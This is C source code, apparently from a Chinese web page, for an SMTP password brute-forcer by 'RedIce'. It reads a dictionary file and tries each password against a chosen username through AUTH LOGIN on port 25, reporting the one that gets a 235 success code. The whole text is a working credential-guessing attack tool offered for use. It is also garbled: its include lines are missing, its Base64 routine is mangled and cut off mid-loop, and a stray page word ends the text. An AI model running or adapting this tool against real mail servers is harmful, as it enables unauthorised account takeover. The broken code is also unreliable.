//E-mail密码暴力破解器 //By RedIce //E-mail:redice@see.xidian.edu.cn #include #include #pragma comment(lib,"ws2_32.lib") char* ch64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; FILE *FileOpr; SOCKET sender; unsigned char *encode(unsigned char *,int);//函数声明;Base64编码 char send_wait(char *,char *,char);//函数声明:发送数据并等待接收到响应码 void usage();//程序使用说明 void initialsocket();//重置Socket连接 struct sockaddr_in dest;//目的地址结构体 void main(int argc,char *argv[]) { char temp[1024]; //读取密码字典缓冲区 int k=0,i=0;//已读取密码文件行数 DWORD starttime;//程序运行开始时间 WSADATA wsa;//WSAData结构体 PHOSTENT hostinfo;//主机信息(域名->IP) char passfile[201];//密码字典文件路径 char username[51];//用户名 char *ICMP_DEST_IP;//目的IP //char ret;//返回值 memset(passfile,0,201);//密码字典文件路径 memset(username,0,51);//欲破解的用户名 if(1==argc)//如果只有默认的命令行参数 则给出程序说明 并退出程序 { usage(); return; } else//如果有多个参数 { for(i=1;i<=argc-1;i++) { if(strstr(argv[i],"-f")) { if(strlen(argv[i+1])>=200) { printf("密码字典文件名太长!\n"); return; } strcpy(passfile,argv[i+1]); i++; } if(strstr(argv[i],"-u")) { if(strlen(argv[i+1])>=50) { printf("用户名名太长!\n"); return; } strcpy(username,argv[i+1]); i++; } if(strstr(argv[i],"-?")) { usage(); return; } } } if(strlen(username)==0||strlen(passfile)==0) { printf("请指定用户名称和密码字典路径!\n\n"); usage(); return; } ICMP_DEST_IP=argv[argc-1];//取得域名(IP) if(WSAStartup(MAKEWORD(2,2),&wsa)) { printf("套接字版本协商出错!\n"); WSACleanup(); return; } //域名解析 hostinfo=gethostbyname(ICMP_DEST_IP); //参数为需要解析的主机名 if(NULL==hostinfo) { printf("无法解析主机%s的IP地址!",ICMP_DEST_IP); WSACleanup(); return; } else { ICMP_DEST_IP=inet_ntoa(*(struct in_addr*)*hostinfo->h_addr_list); } //填充目的地址结构体 memset(&dest,0,sizeof(dest)); dest.sin_family=AF_INET; dest.sin_addr.S_un.S_addr=inet_addr(ICMP_DEST_IP); dest.sin_port=htons(25);//SMTP默认为25 FileOpr=fopen(passfile,"r"); if(NULL==FileOpr) { printf("打开文件失败,请检查输入的文件路径是否正确!\n"); WSACleanup(); return; } initialsocket();//初始化Socket starttime=GetTickCount(); while(1) { memset(temp,0,100); if(NULL==fgets(temp,100,FileOpr)) //读取密码文件 break; else { if(temp[strlen(temp)-1]==0x0A) temp[strlen(temp)-1]=0; printf("已尝试过%d个密码...%s\n",++k,temp); //发送AUTH LOGIN命令,并起到接收响应码334 if(send_wait("AUTH LOGIN","334",0)!=2) continue; //发送经过Base64加密过的用户名,并期待接收响应码334 if(send_wait(username,"334",1)!=2) continue; //发送经过Base64加密过的密码,并期待接收响应码235 if(2!=send_wait(temp,"235",1)) continue; else { printf("Password:%s\n",temp); break; } } Sleep(200); } printf("程序运行耗时:%ds,%dms\n",(GetTickCount()-starttime)/1000,(GetTickCount()-starttime) % 1000); fclose(FileOpr); closesocket(sender); WSACleanup(); return; } //发送数据并等待接收到响应码 //参数:发送的请求;发送数据是否进行Base64编码(1表示加密) //返回值:-1发送失败,0接收数据出错,1没有成功接收到响应码,2成功接收到响应码 char send_wait(char * command,char * responsecode,char isencode) { unsigned char *base64; char smtp_data[101];//提交给SMTP服务器的数据 char recvbuf[201];//接收缓冲区 DWORD starttime;//开始时间 memset(smtp_data,0,101);//将发送缓冲区填零 if(isencode)//如果需要Base64编码 { base64=encode((unsigned char*)command,strlen(command)); memcpy(smtp_data,base64,sizeof(base64)-1); smtp_data[strlen(smtp_data)-1]='='; } else { strcpy(smtp_data,command); } smtp_data[strlen(smtp_data)]=0x0D;//在命令末尾加上换行符 smtp_data[strlen(smtp_data)]=0x0A; if(SOCKET_ERROR==send(sender,smtp_data,strlen(smtp_data),0)) { printf("发送请求出错!\n"); return -1; } memset(recvbuf,0,201);//将接收缓冲区填零 starttime=GetTickCount(); while(1) { if(GetTickCount()-starttime>=2000) return 0; if(SOCKET_ERROR ==recv(sender,recvbuf,200,0)) { printf("接收信息出错!\n"); return 0; } else { //printf("smtp server:%s\n",recvbuf); if(NULL==strstr(recvbuf,responsecode)) { if(strstr(recvbuf,"421")||strstr(recvbuf,"451")) initialsocket(); //重置Socket连接 return 1; } else //成功收到响应码responsecode return 2; } } } //Base64编码 unsigned char *encode(unsigned char *src,int srclen) { int n,buflen,i,j; int pading=0; unsigned char *buf; static unsigned char *dst; buf=src; buflen=n=srclen; if(n%3!=0) /* pad with '=' by using a temp buffer */ { pading=1; buflen=n+3-n%3; buf=(unsigned char *)malloc(buflen+1); memset(buf,0,buflen+1); memcpy(buf,src,n); for(i=0;i<3-n%3;i++) buf[n+i]='='; } dst=(unsigned char *)malloc(buflen*4/3+1); memset(dst,0,buflen*4/3+1); for(i=0,j=0;i>2; dst[j+1]=((buf[i]&0x03)<<4) + ((buf[i+1]&0xF0)>>4); dst[j+2]=((buf[i+1]&0x0F)<<2) + ((buf[i+2]&0xC0)>>6); dst[j+3]=buf[i+2]&0x3F; } for(i=0;i

评论